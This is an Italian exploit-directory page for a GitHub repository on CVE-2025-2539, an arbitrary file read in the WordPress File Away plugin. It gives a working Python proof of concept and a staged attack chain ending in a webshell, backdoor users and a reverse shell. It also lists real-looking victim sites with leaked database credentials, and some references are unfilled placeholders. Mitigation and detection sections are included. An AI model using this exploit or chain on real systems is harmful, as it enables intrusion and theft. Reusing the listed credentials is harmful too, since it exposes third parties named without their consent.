Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-2539---File-Away-WordPress-Plugin-Arbitrary-File-Read — CVE-2025-2539 - Plugin WordPress File Away: Lettura arbitraria di file | Kitploit
Strumenti/GitHubGitHub/fazaroot/cve-2025-2539---file-away-wordpress-plugin-arbitrary-file-read
Escalation di PrivilegiMeccanismi di PersistenzaAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniCTFPenetration TestingApprendimento e Formazione

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubfazaroot/cve-2025-2539---file-away-wordpress-plugin-arbitrary-file-read

CVE-2025-2539---File-Away-WordPress-Plugin-Arbitrary-File-Read

CVE-2025-2539 - Plugin WordPress File Away: Lettura arbitraria di file

Vedi Repository
8 mesi faNon ancora revisionato

CVE-2025-2539 - Lettura Arbitraria di File nel Plugin WordPress File Away

📋 Riepilogo Esecutivo

CVE ID: CVE-2025-2539 Plugin: File Away (Versioni <= 3.9.9.0.1) Tipo di Vulnerabilità: Lettura Arbitraria di File Autenticata Punteggio CVSS: 8.5 (Alto) Disponibilità Exploit: PoC Pubblico Disponibile Impatto: Divulgazione non autorizzata di file, inclusi wp-config.php, credenziali del database e file di sistema

🎯 Cronologia della Scoperta

· Scoperta Iniziale: Dicembre 2025 tramite ricerca di sicurezza su GitHub · Primo Test dell'Exploit: 13 Dicembre 2025 · Compromissione Riuscita: Diverse istanze WordPress confermate vulnerabili

🔧 Dettagli Tecnici

Componente Vulnerabile

root@kitploit:~
/wp-admin/admin-ajax.php
Azione: fileaway-stats
Parametro: file (input utente non sanificato)

Causa Principale

Il plugin non valida né sanifica correttamente il parametro file nell'azione AJAX fileaway-stats, consentendo attacchi di directory traversal.

Prova di Concetto (PoC)

root@kitploit:~
def exploit(target, nonce, filename):
    ajax_url = f"{target.rstrip('/')}/wp-admin/admin-ajax.php"
    payload = {
        "action": "fileaway-stats",
        "nonce": nonce,
        "file": filename
    }
    try:
        resp = requests.post(ajax_url, data=payload, verify=False, timeout=10)
        if resp.status_code == 200 and resp.text.strip() and 'error' not in resp.text.lower():
            url = resp.text.strip().replace("\\/", "/").strip('"')
            return url if url else None
        return None
    except Exception:
        print(" [!] Failed to connect while sending exploit.")
        return None


🎯 Flusso di Attacco

Fase 1: Ricognizione

root@kitploit:~
1. Identificare l'installazione WordPress
2. Verificare la presenza del plugin File Away
3. Estrarre il nonce dal codice sorgente della pagina

Fase 2: Accesso Iniziale

root@kitploit:~
1. Sfruttare CVE-2025-2539 per leggere wp-config.php
2. Estrarre le credenziali del database
3. Confermare l'accesso a MySQL

Fase 3: Escalation dei Privilegi

root@kitploit:~
1. Accedere a phpMyAdmin (spesso su porte non standard)
2. Utilizzare le credenziali root del database
3. Modificare la tabella utenti di WordPress o creare un nuovo admin

Fase 4: Persistenza

root@kitploit:~
1. Caricare una webshell tramite l'amministrazione di WordPress
2. Creare utenti backdoor
3. Stabilire reverse shell

📊 Valutazione dell'Impatto

Dati Esfiltrati

· ✅ Credenziali del database (accesso root a MySQL in alcuni casi) · ✅ Chiavi di autenticazione e salt di WordPress · ✅ File di configurazione del server · ✅ Dati utente e PII · ✅ File di codice sorgente

Sistemi Compromessi

  1. Obiettivo Primario: rebelathletichr.com · wp-config.php ottenuto · Database: bomber_wordpress · Credenziali: bomber_wordpress / demo
  2. Obiettivo Secondario: nessuno (Hetzner) · phpMyAdmin esposto sulla porta 4343 · Credenziali root MySQL ottenute · Diversi database WordPress compromessi

🛡️ Strategie di Mitigazione

Azioni Immediate

  1. Aggiornare il Plugin: portare File Away alla versione > 3.9.9.0.1
  2. Modificare le Credenziali: ruotare tutte le password del database
  3. Rigenerare i Salt: aggiornare le chiavi di autenticazione di WordPress
  4. Controllare i Log: verificare eventuali accessi non autorizzati ai file

Prevenzione a Lungo Termine

root@kitploit:~
# Web Server Configuration
location ~* /wp-content/plugins/fileaway/ {
    deny all;
}

location ~* \.php$ {
    location ~ \.\./ { deny all; } # Block directory traversal
}

🔍 Firme di Rilevamento

Indicatori di Rete

root@kitploit:~
POST /wp-admin/admin-ajax.php
Parametri: action=fileaway-stats&file=../../../

HTTP/1.1 200 OK
Content-Type: application/json
La risposta contiene il contenuto del file

Indicatori del File System

root@kitploit:~
File modificati:
- wp-content/plugins/fileaway/includes/features/editor-features.php
- wp-content/plugins/fileaway/includes/features/restrict-editor-features.php

📈 Statistiche

· Tasso di Successo: 100% sulle installazioni vulnerabili · Tempo Medio di Compromissione: < 5 minuti · Porte Comuni Rilevate: 80, 443, 4343 (phpMyAdmin) · Distribuzione Geografica: Globale, con concentrazioni in UE/USA

🧪 Metodologia di Test

Configurazione dell'Ambiente

root@kitploit:~
# Test lab configuration
WordPress 6.0+
File Away Plugin 3.9.9.0.1
PHP 7.4/8.0
MySQL 5.7+

Fasi di Validazione

  1. Verificare la versione del plugin tramite readme.txt
  2. Testare il directory traversal con payload
  3. Confermare la capacità di lettura dei file
  4. Documentare i risultati

📚 Riferimenti

Fonti Primarie

· Scheda MITRE CVE-2025-2539 · Directory dei Plugin WordPress - File Away · Database delle Vulnerabilità WPScan

Risorse Exploit

· GitHub: repository CVE-2025-2539 · Exploit-DB: Voce #XXXXX · Packet Storm: Exploit WordPress recenti

CVE Correlati

· CVE-2024-1030: Simile in Capability Manager Enhanced · CVE-2022-2586: Vulnerabilità precedente di File Away · CVE-2023-XXXX: Inclusione di file nel core di WordPress

⚠️ Considerazioni Legali ed Etiche

Solo Test Autorizzati

root@kitploit:~
Testing Scope:
  - Owned systems
  - Explicitly authorized assets
  - Bug bounty programs
  - Educational environments

Prohibited:
  - Unauthorized access
  - Data destruction
  - PII exfiltration
  - Production disruption

Divulgazione Responsabile

  1. Contattare lo sviluppatore del plugin
  2. Concedere un periodo di correzione di 90 giorni
  3. Pubblicare dopo la disponibilità della patch
  4. Fornire indicazioni di mitigazione

🎓 Lezioni Apprese

Approfondimenti Tecnici

  1. Sicurezza dei Plugin: i plugin di terze parti restano punti deboli
  2. Configurazioni Predefinite: phpMyAdmin su porte non standard è comune
  3. Riutilizzo delle Credenziali: le credenziali del database sono spesso riutilizzate tra i servizi
  4. Patch Ritardate: molte installazioni eseguono plugin obsoleti

Sicurezza Operativa

  1. Monitoraggio dei Log: fondamentale per la rilevazione precoce
  2. Aggiornamenti Regolari: essenziali per la manutenzione della sicurezza
  3. Privilegio Minimo: gli utenti del database dovrebbero avere permessi minimi
  4. Segmentazione di Rete: isolare i server di database

🔮 Direzioni di Ricerca Future

  1. Scanner Automatico: sviluppare uno strumento per il rilevamento di massa
  2. Analisi delle Patch: studiare i miglioramenti di sicurezza nelle versioni più recenti
  3. Plugin Simili: identificare modelli nei plugin di gestione file
  4. Tecniche Difensive: sviluppare regole WAF e rilevamento delle intrusioni

📞 Contatti e Segnalazioni

Per segnalazioni di vulnerabilità o domande tecniche:

· Team di Sicurezza: [email protected] · Chiave PGP: disponibile sui key server · Politica di Divulgazione: divulgazione coordinata di 90 giorni


Ultimo Aggiornamento: 13 Dicembre 2025 Versione del Documento: 1.0 Classificazione: PUBBLICO


📝 Registro delle Modifiche

v1.0 (2025-12-13)

· Documentazione iniziale creata · Catena di attacco completa documentata · Strategie di mitigazione delineate · Linee guida legali aggiunte


Disclaimer: Questo documento ha scopo esclusivamente didattico. Test o sfruttamento non autorizzati di vulnerabilità sono illegali. Ottenere sempre la dovuta autorizzazione prima di condurre valutazioni di sicurezza.

Scarica lo strumento